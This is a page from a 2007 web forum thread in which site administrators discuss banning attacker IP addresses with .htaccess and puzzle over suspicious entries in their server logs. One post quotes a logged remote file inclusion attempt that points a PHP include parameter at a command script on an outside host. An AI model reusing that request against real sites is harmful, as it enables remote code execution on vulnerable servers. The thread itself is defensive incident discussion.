Page 2 of 2
Posted:
Thu May 17, 2007 10:42 amAuthor: Omni-Lee
"ZacFields" wrote:These IP's need to be blocked from .htaccess to prevent them from running requests on your forum's files.
Can you be more specific as to what type of requests? I assume you don't mean sql as that wouldn't be considered minor.
Re: Security Flaw
Posted:
Thu May 17, 2007 4:50 pmAuthor: Frost
He means, any requests
If you ban the ips in htaccess in your root directory, they cant access anything beyond that point (your whole site is gone to them)
Note: if you put this in htaccess say 3 folders into your server it only affects from then foward
htaccess in root folder example
Access > [htaccess in root] > All Following Folders Denied
htaccess in later folder example
Access > Root > 2nd Folder > 3rd Folder > forum > [htaccess in forum] All Following Folders Denied
That way, an attacker would still have access to your root, 2nd, 3rd, and forum folders
That's how it works as far as I know
Posted:
Thu May 17, 2007 5:09 pmAuthor: ZacFields
Thanks Frost...I was kinda stumped a little when trying to think of how to explain a request.
Basically when you open a page in a forum, it performs a GET request for all the pieces of that page. Like the images, includes.php, all the aspect of that page. When you make a post...pretty much anytime you press the "submit" button it sends a POST request.
But for an example as to why you would want to ban things like this from .htaccess in your root: You all know what happens when you ban someone from your forum, right? Basically it opens up everything (all the requests still get performed) but IM software is written to recognize "hey, this guy is banned" and it sends them a nice little banned message saying that this site is banned.
But blocking from .htaccess, they can't even bother your server with requests because before they even get to your forums, or any file inside your forums your server itself recognizes that the IP is not supposed to be there so it actually prevents them from even seeing your site, or even performing any requests on the files in the same folder, or after your .htaccess file.
Hope that helps.
Zac
Posted:
Thu May 17, 2007 7:54 pmAuthor: Omni-Lee
Thank you both for the de.scription.
CT is showing the attacks as slowing down, but they are still coming.
Todays:
17 May 2007 06:27 pm //includes/kb_constants.php?module_root_path=http://www.firp.it/smf/Themes/default/images/english/cmd.txt? libwww-perl/5.805 209.172.57.139
Another IP for the .htaccess file.
While scanning the server logs I found the following:
193.232.119.173 - - [17/May/2007:05:21:21 -0400] "GET //<siteURL>//<siteURL>/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844 HTTP/1.1" 404 2351 <siteURL> "http://<siteURL>//<siteURL>//<SiteURL>/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
What do you make of it? It feels fishy, but I'd like confirmation.
Posted:
Fri May 18, 2007 8:40 amAuthor: nGAGE
"Omni-Lee";p="25525" wrote:While scanning the server logs I found the following:
193.232.119.173 - - [17/May/2007:05:21:21 -0400] "GET //www.mithrilcrowns.net//www.mithrilcrowns.net/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844 HTTP/1.1" 404 2351
http://www.mithrilcrowns.net "http://www.mithrilcrowns.net//www.mithrilcrowns.net//www.mithrilcrowns.net/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
What do you make of it? It feels fishy, but I'd like confirmation.
Looks like somebody's profile is being used to GET something through there or something... dunno and i'm not gonna go to that link either
